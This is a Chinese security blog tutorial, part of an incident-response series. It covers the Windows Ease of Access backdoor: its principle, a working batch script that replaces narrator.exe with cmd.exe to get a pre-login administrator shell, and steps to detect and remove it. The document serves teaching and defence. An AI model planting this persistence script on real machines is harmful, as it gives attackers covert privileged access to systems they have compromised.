[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-6：windows轻松访问后门

🍬 博主介绍

👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~
✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

1.6 Windows后门应急-6：Windows轻松使用后门

Windows轻松使用后门是一种通过利用Windows系统中的“轻松访问”功能创建后门的方法。
Windows轻松使用后门是一种利用Windows系统特性创建的隐蔽且强大的后门技术。

1.6.1 Windows轻松使用后门介绍

1.6.1.1 原理

Windows轻松使用后门是指攻击者通过替换Windows系统中“轻松访问”功能的某个程序（如放大镜）为cmd.exe，从而实现在不登录的情况下以管理员权限打开命令提示符，进而控制计算机。这种方法由于其隐蔽性和便捷性，成为了一种常见的系统后门技术。

1.6.1.2 原理

Windows系统的“轻松访问”功能允许用户在不登录的情况下直接使用一些辅助工具，如放大镜、讲述人等。攻击者可以利用这一特性，将其中一个程序（如放大镜）替换为cmd.exe，这样当用户点击该程序时，实际上执行的是cmd.exe，从而获得系统管理员权限的命令提示符。

1.6.1.3 实现步骤

1.找到并备份原始的放大镜程序（magnify.exe）。
2.修改放大镜程序的所有者为当前用户，并赋予完全控制权限。
3.将放大镜程序重命名为一个备用名称（如magnify_back.exe）。
4.复制cmd.exe程序，并将其重命名为放大镜程序的名称（如magnify.exe）。
5.重启电脑，测试后门是否生效。此时，点击“轻松访问”中的放大镜程序，应该会出现cmd命令提示符界面。

1.6.1.4 防御措施

1.定期检查系统文件的完整性和权限设置，确保关键系统文件没有被篡改或替换。
2.限制非授权用户对系统文件的访问和修改权限。
3.安装并更新杀毒软件和防火墙，以增强系统的安全性。
4.对于重要的系统和数据，建议实施严格的访问控制和备份策略。

1.6.1.5 应用场景

Windows轻松使用后门通常被用于远程控制和管理目标计算机。攻击者可以通过后门执行各种命令，如创建新用户、修改系统设置、窃取敏感信息等。这种后门技术在网络安全应急与安全防御中是最难排查的一种后渗透手段之一。

1.6.2 Windows轻松使用后门创建实战

1.6.2.1 前提条件

假设在攻击的过程中，我们通过利用各种getshell手段，不仅成功渗透进了目标服务器的防御体系，还进一步拿到了具有最高控制权限的administrator权限，这意味着我们已经能够完全掌控这台服务器，可以执行任何我们需要的操作。这时候我们需要进行权限维持，从而创建各种后门，包括我们这里讲到的启动项后门。

1.6.2.2 环境介绍

靶机： windows 10
IP： 10.0.0.165

1.6.2.3 创建bat脚本

1.6.2.3.1 bat脚本主要内容

cd c:\windows\system32
takeown /f narrator.exe
icacls narrator.exe /grant administrators:F
ren narrator.exe narrator_backup.exe
copy cmd.exe narrator.exe

1.6.2.3.2 bat脚本内容解析

cd c:\windows\system32：这行命令将当前目录更改为 C:\Windows\System32，这是 Windows 系统目录。
takeown /f narrator.exe：这行命令尝试获取 narrator.exe 文件的所有权。如果当前用户没有管理员权限，这一步会失败。
icacls narrator.exe /grant administrators:F：这行命令将 narrator.exe 文件的访问控制列表（ACL）设置为允许管理员组完全控制该文件。
ren narrator.exe narrator backup.exe：这行命令将 narrator.exe 重命名为 narrator_backup.exe。
copy cmd.exe narrator.exe：这行命令将 cmd.exe 复制到 narrator.exe 的位置，从而用 cmd.exe 替换了原来的 narrator.exe。

1.6.2.3.3 bat脚本优化如下

@echo off
cd c:\windows\system32

:: 获取文件所有权
takeown /f narrator.exe
if %errorlevel% neq 0 (
    echo Failed to take ownership of narrator.exe
    exit /b 1
)

:: 设置文件权限
icacls narrator.exe /grant administrators:F
if %errorlevel% neq 0 (
    echo Failed to set permissions on narrator.exe
    exit /b 1
)

:: 重命名原始文件
ren narrator.exe narrator_backup.exe
if %errorlevel% neq 0 (
    echo Failed to rename narrator.exe
    exit /b 1
)

:: 复制cmd.exe到narrator.exe位置
copy cmd.exe narrator.exe
if %errorlevel% neq 0 (
    echo Failed to copy cmd.exe to narrator.exe
    exit /b 1
)

echo Successfully replaced narrator.exe with cmd.exe

1.6.2.4 上传脚本到windows并执行

随便怎么上传都行，我这里在本机创建的，就直接拖入windows了。

脚本内容

右键管理员运行

注销退出登录
图形化注销

命令行注销

logoff

1.6.2.5 后门创建成功

点击轻松使用

打开讲述人

成功弹出CMD窗口

1.6.2.6 注意

轻松使用下面所有的内容都可以成为一个后门。
例如，我前面做简介我用的是放大镜，但是我实验用的是讲述人。感兴趣的可以都去试一试，这里不做一一列举。

1.6.3 Windows轻松使用后门应急实战

1.6.3.1 检查轻松访问内容

一一检查轻松访问内容，一一处理。
发现打开讲述人的时候弹出cmd窗口。

1.6.3.2 应急处置

1.6.3.2.1 方案一：使用备份

如果在修改之前创建了narrator.exe的备份（例如命名为narrator_backup.exe），你可以通过命令行将备份文件恢复为原始文件名。我们这里做实验是创建了备份文件的

@echo off
cd c:\windows\system32
takeown /f narrator.exe
icacls narrator.exe /grant administrators:F
copy narrator_backup.exe narrator.exe

管理员运行身份运行之后，讲述人后门失效

1.6.3.2.2 方案二：从其他计算机复制

如果当前计算机没有备份，可以从另一台相同版本的Windows计算机上复制narrator.exe文件到你的C:\Windows\System32目录中。

1.6.3.2.3 方案三：使用系统文件检查器（SFC）

系统文件检查器（SFC）是Windows内置的一个实用工具，用于扫描和修复损坏或丢失的系统文件。打开命令提示符（以管理员身份运行），然后输入以下命令：

sfc /scannow

该命令会扫描所有受保护的系统文件，并替换不正确的版本。

1.6.3.2.4 方案四：使用DISM命令

部署映像服务和管理工具（DISM）是一个功能强大的命令行工具，用于修复Windows映像。在命令提示符中输入以下命令：

DISM /Online /Cleanup-Image /RestoreHealth

1.2.3.2.5 方案五：重置电脑

如果以上方法都无法解决问题，或者你不确定如何操作，可以考虑重置电脑。这将会删除所有个人文件、应用程序和设置，并将Windows恢复到出厂状态。在重置之前，请务必备份重要数据。

相关资源

[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-1：windows后门账户
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-2：计划任务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-3：windows服务后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-4：启动项后门
[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置-5：Shift 粘贴键后门